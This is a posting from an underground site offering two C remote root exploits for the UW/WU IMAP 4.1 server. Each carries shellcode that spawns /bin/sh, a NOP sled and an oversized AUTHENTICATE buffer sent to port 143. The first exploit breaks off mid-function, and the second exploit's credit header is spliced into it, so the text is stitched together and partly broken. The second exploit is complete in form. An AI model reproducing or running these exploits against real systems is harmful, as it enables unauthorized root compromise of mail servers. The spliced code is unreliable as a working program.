-----[ www.TheCyberUnderground.com

( two xpl0its )

--Exploit #1--
/**
 *** i386 BSD remote root exploit for UW imapd IMAP 4.1 server
 ***
 *** This is *not* the same bug addressed in CERT Advisory CA-97.09!
 ***
 *** Usage: % (imappy nop esp offset; cat) | nc hostname 143
 ***
 *** where nop is the number of NOP opcodes to place at the start of the
 *** exploit buffer (I use 403), esp is the %esp stack pointer value, and
 *** offset is the number of bytes to add to esp to calculate your target
 *** %eip.
 ***
 *** Demonstration values for UW imapd 10.234 (part of Pine 4.00):
 ***
 *** imappy 403 0xefbfd5e8 100 (BSDI 3.0)
 *** imappy 403 0xefbfd4b8 100 (FreeBSD 2.2.5)
 ***
 *** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
 ***
 *** Cheez Whiz
 *** cheezbeast@hotmail.com
 ***
 *** July 16, 1998
 **/

 #include <stdio.h>
 #include <stdlib.h>
 #include <limits.h>
 #include <string.h>

 #define BUFLEN (2*1024)
 #define NOP 0x90

 char shell[] =
 /* 0 */ "\xeb\x34" /* jmp springboard */
 /* start: */
 /* 2 */ "\x5e" /* popl %esi */
 /* 3 */ "\x8d\x1e" /* leal (%esi),%ebx */
 /* 5 */ "\x89\x5e\x0b" /* movl %ebx,0xb(%esi) */
 /* 8 */ "\x31\xd2" /* xorl %edx,%edx */
 /* 10 */ "\x89\x56\x07" /* movl %edx,0x7(%esi) */
 /* 13 */ "\x89\x56\x0f" /* movl %edx,0xf(%esi) */
 /* 16 */ "\x89\x56\x14" /* movl %edx,0x14(%esi) */
 /* 19 */ "\x88\x56\x19" /* movb %dl,0x19(%esi) */
 /* 22 */ "\x31\xc0" /* xorl %eax,%eax */
 /* 24 */ "\xb0\x7f" /* movb $0x7f,%al */
 /* 26 */ "\x20\x46\x01" /* andb %al,0x1(%esi) */
 /* 29 */ "\x20\x46\x02" /* andb %al,0x2(%esi) */
 /* 32 */ "\x20\x46\x03" /* andb %al,0x3(%esi) */
 /* 35 */ "\x20\x46\x05" /* andb %al,0x5(%esi) */
 /* 38 */ "\x20\x46\x06" /* andb %al,0x6(%esi) */
 /* 41 */ "\xb0\x3b" /* movb $0x3b,%al */
 /* 43 */ "\x8d\x4e\x0b" /* leal 0xb(%esi),%ecx */
 /* 46 */ "\x89\xca" /* movl %ecx,%edx */
 /* 48 */ "\x52" /* pushl %edx */
 /* 49 */ "\x51" /* pushl %ecx */
 /* 50 */ "\x53" /* pushl %ebx */
 /* 51 */ "\x50" /* pushl %eax */
 /* 52 */ "\xeb\x18" /* jmp exec */
 /* springboard: */
 /* 54 */ "\xe8\xc7\xff\xff\xff" /* call start */
 /* data: */
 /* 59 */ "\x2f\xe2\xe9\xee\x2f\xf3\xe8" /* DATA (disguised /bin/sh) */
 /* 66 */ "\x01\x01\x01\x01" /* DATA */
 /* 70 */ "\x02\x02\x02\x02" /* DATA */
 /* 74 */ "\x03\x03\x03\x03" /* DATA */
 /* exec: */
 /* 78 */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall 0x7,0x0 */

 char buf[BUFLEN];
 unsigned long int nop, esp;
 long int offset;

 void
 main (int argc, char *argv[])
 {
 int i;

/*

THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF THE ADM CREW
   
Linux WU-IMAPD 4.1 remote root exploit (4/98)
  by   ndubee||plaguez
       dube0866@eurobretagne.fr


Usage:   ./imapx <offset>
           
             where offset = -500..500  (brute force if 0 doesnt work) 
     



Credits:
  - Cheez Whiz (original x86 BSD exploit)
  - #!w00w00 and #!ADM

Note:
    if you plan to port this to other OS., make sure the
    shellcode doesn't contain lower case chars since imapd
    will toupper() the shellcode, thus fucking it up.

  */
  
--Exploit #2--
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 2048
#define NOP 0x90

char shell[] =
/*
        jmp 56 
        popl %esi
        movl    %esi,%ebx
        movl    %ebx,%eax
        
        addb    $0x20,0x1(%esi)
        addb    $0x20,0x2(%esi)
        addb    $0x20,0x3(%esi)
        addb    $0x20,0x5(%esi)
        addb    $0x20,0x6(%esi)
        
        movl    %esi,%edi
        addl    $0x7,%edi
        xorl    %eax,%eax
        stosb   %al,%es:(%edi)
        movl    %edi,%ecx
        movl    %esi,%eax
        stosl   %eax,%es:(%edi)
        movl    %edi,%edx
        xorl    %eax,%eax
        stosl   %eax,%es:(%edi)
        movb    $0x8,%al
        addb    $0x3,%al
        int     $0x80
        xorl    %ebx,%ebx
        movl    %ebx,%eax
        incl    %eax
        int     $0x80
        call   -61 
        .string \"/BIN/SH\"
        .byte   0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff  ;markup

	*/

"\xeb\x38\x5e\x89\xf3\x89\xd8\x80"
"\x46\x01\x20\x80\x46\x02\x20\x80"
"\x46\x03\x20\x80\x46\x05\x20\x80"
"\x46\x06\x20\x89\xf7\x83\xc7\x07"
"\x31\xc0\xaa\x89\xf9\x89\xf0\xab"
"\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40"
"\xcd\x80\xe8\xc3\xff\xff\xff\x2f"
"\x42\x49\x4e\x2f\x53\x48\x00";





void
main (int argc, char *argv[])
{
  char buf[BUFLEN];
  int offset=0,nop,i;
  unsigned long esp; 
    

  fprintf(stderr,"usage: %s <offset>\n", argv[0]);
    
  nop = 403;
  esp = 0xbffff520;
  if(argc>1) 
	  offset = atoi(argv[1]);

  memset(buf, NOP, BUFLEN);
  memcpy(buf+(long)nop, shell, strlen(shell));
  
  for (i = 512; i < BUFLEN - 4; i += 4)
    *((int *) &buf[i]) = esp + (long) offset;

  printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
  for (i = 0; i < BUFLEN; i++)
    putchar(buf[i]);
  
  printf("\r\n");

  return;
}